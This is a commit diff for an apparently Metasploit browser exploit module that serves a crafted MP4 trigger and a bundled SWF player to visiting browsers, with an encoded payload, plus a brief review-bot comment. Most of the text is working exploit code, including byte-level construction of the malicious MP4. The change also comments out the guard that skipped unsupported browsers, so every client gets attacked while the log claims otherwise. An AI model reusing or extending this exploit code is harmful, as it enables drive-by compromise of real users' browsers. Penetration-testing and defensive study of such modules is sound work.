Test out new player code
parent
eb847a3dfb
commit
b0db18674c
BIN
data/exploits/mp4player.swf
Executable file
BIN
data/exploits/mp4player.swf
Executable file
Binary file not shown.
@ -69,8 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation']),
|
||||
OptString.new('SWF_PLAYER_URI', [true, 'Path to the SWF Player'])
|
||||
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
@ -94,19 +93,25 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
#send_not_found(cli)
|
||||
#return
|
||||
my_target = targets[0]
|
||||
end
|
||||
|
||||
# The SWF requests our MP4 trigger
|
||||
if request.uri =~ /\.mp4$/
|
||||
print_status("Sending MP4 to #{cli.peerhost}:#{cli.peerport}...")
|
||||
#print_error("Sorry, not sending you the mp4 for now")
|
||||
#send_not_found(cli)
|
||||
send_response(cli, @mp4, {'Content-Type'=>'video/mp4'})
|
||||
return
|
||||
end
|
||||
|
||||
# The SWF request itself
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status("Sending SWF to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response(cli, @swf, {'Content-Type'=>'flash/swf'})
|
||||
return
|
||||
end
|
||||
|
||||
# Set payload depending on target
|
||||
p = payload.encoded
|
||||
|
||||
@ -140,8 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
|
||||
mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
|
||||
swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true&image=video.jpg&file=#{mp4_uri}"
|
||||
swf_uri = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf"
|
||||
|
||||
html = %Q|
|
||||
<html>
|
||||
@ -166,9 +170,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit
|
||||
@mp4 = create_mp4
|
||||
@swf = create_swf
|
||||
super
|
||||
end
|
||||
|
||||
def create_swf
|
||||
path = ::File.join( Msf::Config.install_root, "data", "exploits", "mp4player.swf" )
|
||||
fd = ::File.open( path, "rb" )
|
||||
swf = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
return swf
|
||||
end
|
||||
|
||||
def create_mp4
|
||||
ftypAtom = "\x00\x00\x00\x20" #Size
|
||||
ftypAtom << "ftypisom"
|
||||
|
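Review bot: The `my_target.nil?` branch still sits under the comment "Avoid the attack if the victim doesn't have the same setup we're targeting" and still logs "Browser not supported, will not launch attack", but the new side appears to continue with `my_target = targets[0]`, with `send_not_found(cli)` and `return` commented out. The +/- markers are lost on this page, so the side of each line is inferred from the hunk counts. As written, clients that matched no declared target are no longer turned away, so the module serves content outside its stated target list and the operator log says the opposite of what happened. If this is temporary debugging for the player test, restore `send_not_found(cli)` and `return` before merge; if the fallback is intended, reword the comment and the `print_error` text to say so. Separately, `create_swf` opens the file without a block, so the descriptor stays open if the read raises; `::File.open(path, "rb") { |fd| fd.read }` closes it on every path.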